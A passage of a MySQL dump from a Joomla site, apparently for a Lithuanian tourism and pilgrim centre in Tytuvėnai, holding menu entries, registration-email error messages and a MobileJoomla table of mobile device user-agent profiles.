00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',71,72,0,'*',0),(317,'mainmenu','Mažos vertės už 2016 m.','mazos-vertes-uz-2016-m','','apie-centra/viesieji-pirkimai/mazos-vertes-uz-2016-m','index.php?option=com_content&view=article&id=259','component',0,284,3,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',67,68,0,'*',0),(319,'main','COM_JALANG','com-jalang','','com-jalang','index.php?option=com_jalang','component',0,1,1,10090,0,0,'0000-00-00 00:00:00',0,1,'components/com_jalang/asset/joomlart.png',0,'',345,346,0,'',1),(321,'mainmenu','Gedulingi pietūs','gedulingi-pietus','','maitinimas/gedulingi-pietus','index.php?option=com_content&view=article&id=320','component',0,288,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',116,117,0,'*',0),(323,'mainmenu','Rožių sodo įrengimas','roziu-sodo-irengimo-projektas','','projektai/roziu-sodo-irengimo-projektas','index.php?option=com_content&view=article&id=330','component',1,276,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',140,141,0,'*',0),(324,'mainmenu','Tytuvėnų kultūros paveldas ir jo pėdsakai','tytuvenu-kulturos-paveldas-ir-jo-pedsakai','','projektai/tytuvenu-kulturos-paveldas-ir-jo-pedsakai','index.php?option=com_content&view=article&id=359','component',1,276,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',142,143,0,'*',0),(330,'main','MobileJoomla','mobilejoomla','','mobilejoomla','index.php?option=com_mobilejoomla','component',0,1,1,10092,0,0,'0000-00-00 00:00:00',0,1,'components/com_mobilejoomla/assets/images/mj16x16.gif',0,'',347,348,0,'',1),(331,'mobilemenu','asdasd','asdasd','','asdasd','index.php?option=com_content&view=article&id=210','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',349,350,0,'*',0),(333,'mainmenu','Trasos ','trasos','','turizmo-informacija/trasos','http://www.trp.lt/index.php/pesciuju-trasos','url',1,287,2,0,0,0,'0000-00-00 00:00:00',1,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',106,111,0,'*',0),(336,'mainmenu','Tytuvėnai','tytuvenai','','apgyvendinimas/tytuvenai','index.php?option=com_content&view=article&id=390','component',1,289,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',124,125,0,'*',0),(337,'mainmenu','Veiklos planas','veiklos-planas','','apie-centra/veiklos-planas','index.php?option=com_content&view=article&id=391','component',1,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',80,81,0,'*',0),(334,'mainmenu','Pėsčiųjų trasos','2022-09-19-19-54-37','','turizmo-informacija/trasos/2022-09-19-19-54-37','http://www.trp.lt/index.php/pesciuju-trasos','url',1,333,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',107,108,0,'*',0),(335,'mainmenu','Dviračių trasos','2022-09-19-20-01-16','','turizmo-informacija/trasos/2022-09-19-20-01-16','http://www.trp.lt/index.php/dviraciu-trasos','url',1,333,3,0,0,0,'0000-00-00 00:00:00',1,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',109,110,0,'*',0),(338,'mainmenu','Tytuvėnų piligrimų centras įveiklinimas ir aktualizavimas','tytuvenu-piligrimu-centras-iveiklinimas-ir-aktualizavimas','','projektai/tytuvenu-piligrimu-centras-iveiklinimas-ir-aktualizavimas','index.php?option=com_content&view=article&id=393','component',1,276,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',144,145,0,'*',0);
/*!40000 ALTER TABLE `xyhmu_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_menu_types`
--

DROP TABLE IF EXISTS `xyhmu_menu_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_menu_types` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `menutype` varchar(24) NOT NULL,
  `title` varchar(48) NOT NULL,
  `description` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_menutype` (`menutype`)
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_menu_types`
--

LOCK TABLES `xyhmu_menu_types` WRITE;
/*!40000 ALTER TABLE `xyhmu_menu_types` DISABLE KEYS */;
INSERT INTO `xyhmu_menu_types` VALUES (1,'mainmenu','Main Menu','The main menu for the site'),(8,'mobilemenu','Mobile Menu','');
/*!40000 ALTER TABLE `xyhmu_menu_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_messages`
--

DROP TABLE IF EXISTS `xyhmu_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_messages` (
  `message_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id_from` int(10) unsigned NOT NULL DEFAULT '0',
  `user_id_to` int(10) unsigned NOT NULL DEFAULT '0',
  `folder_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `priority` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `subject` varchar(255) NOT NULL DEFAULT '',
  `message` text NOT NULL,
  PRIMARY KEY (`message_id`),
  KEY `useridto_state` (`user_id_to`,`state`)
) ENGINE=MyISAM AUTO_INCREMENT=1211 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_messages`
--

LOCK TABLES `xyhmu_messages` WRITE;
/*!40000 ALTER TABLE `xyhmu_messages` DISABLE KEYS */;
INSERT INTO `xyhmu_messages` VALUES (1210,135,135,0,'2025-04-27 14:32:53',0,0,'Klaida siunčiant elektroniniu paštu','Įvyko klaida siunčiant nario registraciją elektroniniu paštu. Klaida yra: Nepavyko inicijuoti pašto funkcijos. Narys, kuris bandė registruotis: MerleMiz'),(1209,135,135,0,'2025-04-26 22:37:40',0,0,'Klaida siunčiant elektroniniu paštu','Įvyko klaida siunčiant nario registraciją elektroniniu paštu. Klaida yra: Nepavyko inicijuoti pašto funkcijos. Narys, kuris bandė registruotis: Corneliusnam'),(1208,135,135,0,'2025-04-12 01:57:21',0,0,'Klaida siunčiant elektroniniu paštu','Įvyko klaida siunčiant nario registraciją elektroniniu paštu. Klaida yra: Nepavyko inicijuoti pašto funkcijos. Narys, kuris bandė registruotis: ikafolos');
/*!40000 ALTER TABLE `xyhmu_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_messages_cfg`
--

DROP TABLE IF EXISTS `xyhmu_messages_cfg`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_messages_cfg` (
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `cfg_name` varchar(100) NOT NULL DEFAULT '',
  `cfg_value` varchar(255) NOT NULL DEFAULT '',
  UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_messages_cfg`
--

LOCK TABLES `xyhmu_messages_cfg` WRITE;
/*!40000 ALTER TABLE `xyhmu_messages_cfg` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_messages_cfg` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_mj_amdd`
--

DROP TABLE IF EXISTS `xyhmu_mj_amdd`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_mj_amdd` (
  `ua` varchar(255) COLLATE utf8_bin NOT NULL,
  `group` varchar(32) COLLATE utf8_bin NOT NULL,
  `data` varchar(255) COLLATE utf8_bin NOT NULL,
  UNIQUE KEY `ua` (`ua`),
  KEY `group` (`group`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_mj_amdd`
--

LOCK TABLES `xyhmu_mj_amdd` WRITE;
/*!40000 ALTER TABLE `xyhmu_mj_amdd` DISABLE KEYS */;
INSERT INTO `xyhmu_mj_amdd` VALUES ('Alcatel-OT-800A','alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Android','android','{\"type\":\"desktop\",\"markup\":\"\"}'),('Athens15_TD/V2 Linux/3.0 Android/4.0 Release/02.15 Browser/AppleWebKit534.30 Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('BlackBerry8520/5.0 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100','blackberry','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('BlackBerry9300/5.0 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100','blackberry','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('HUAWEI_Y220T_TD/1.0 Android/2.3 SC8810_CMCC/W12.06 Release/06.22 Browser/AppleWebKit533.1','huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('LG-A390','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('LG-A395','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('LG-C105/V100 Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":176,\"screenHeight\":220,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('LG-C297','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('LG-C297/V100 Obigo/Q05A MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('LG-C299','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('LG-E400/Mozilla/5.0 (Linux; Android 2.*; LG-E400) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('LG-E430/Mozilla/5.0 (Linux; Android 4.*; LG-E430) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('LG-E610/V10e Mozilla/5.0 (Linux; Android 4.*; LG-E610) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('LG-F300','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('LG-G420','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":220,\"screenHeight\":140,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('LG-GD330/V100 Obigo/WAP2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1','lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":280,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Lenovo A390_ROW:Mozilla/5.0 (Linux; Android 4.*; Lenovo A390_ROW/S030) AppleWebKit534.30 (KHTML, like Gecko) Mobile Safari/*','lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Lenovo A529 Linux/3.4 Android/2.3 Release/07.26 Browser/AppleWebKit533.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 Mobile Safari/*','lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Lenovo-A300t_TD/S100 Linux/2.6 Android/2.3 Release/08.01 Browser/AppleWebKit533.1 Mobile Safari/*','lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Lenovo-A318t_TD/S100 Linux/3.4 Android/2.3 Release/04.26 Browser/AppleWebKit533.1 Mobile Safari/*','lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Lenovo-A396/S100 Linux/3.10 Android/2.3 Release/02.12 Browser/AppleWebKit533.1 Profile/ Configuration Safari/*','lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Lenovo-A788t_TD/S100 Linux/3.4 Android/4.3 Release/08.15 Browser/AppleWebKit534.30 Mobile Safari/*','lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Lenovo-A820/S100 Linux/3.4 Android/4.1 Release/11.14 Browser/AppleWebKit534.30 Profile/ Configuration/ Safari/*','lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('LenovoA658t_TD/1.0 Android 4.* Release/10.01 Browser/WAP2.0 appleWebkit/534.30','lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('MAUI_WAP_Browser','','{\"type\":\"mobile\",\"markup\":\"wml\",\"screenWidth\":168,\"screenHeight\":200,\"imageFormats\":[\"jpg\",\"gif\",\"wbmp\"]}'),('MOT-L7v MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1','motorola_mot','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":168,\"screenHeight\":180,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('MOT-V177 UP.Browser/6.2 (GUI) MMP/2.0','motorola_mot','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":116,\"screenHeight\":140,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('MOT-V9mm UP.Browser/6.2 (GUI) MMP/2.0','motorola_mot','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":220,\"screenHeight\":300,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('MT6735_TD/V1 Linux/3.10 Android/5.1 Release/03.03 Browser/AppleWebKit537.36 Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('MT6735_TD/V1 Linux/3.10 Android/5.1 Release/03.10 Browser/AppleWebKit537.36 Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('MT6735_TD/V1 Linux/3.10+ Android/5.1 Release/03.03 Browser/AppleWebKit537.36 Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('MT6735_TD/V1 Linux/3.18 Android/6.0 Release/03.10 Browser/AppleWebKit537.36 Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('MT6735_TD/V1 Linux/3.18+ Android/6.0 Release/03.03 Browser/AppleWebKit537.36 Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('MT6735_TD/V1 Linux/3.18+ Android/6.0 Release/10.10 Browser/AppleWebKit537.36 Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('MT6735_TD/V1 Mozilla/5.0 (Linux;Android 5.*;Philips S396) Linux/3.10 Android/5.1 Release/03.03 Browser/AppleWebKit534.30 (HTML,like Gecko) Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('MT6753_TD/V1 Linux/3.10 Android/5.1 Release/03.10 Browser/AppleWebKit537.36 Chrome Mobile 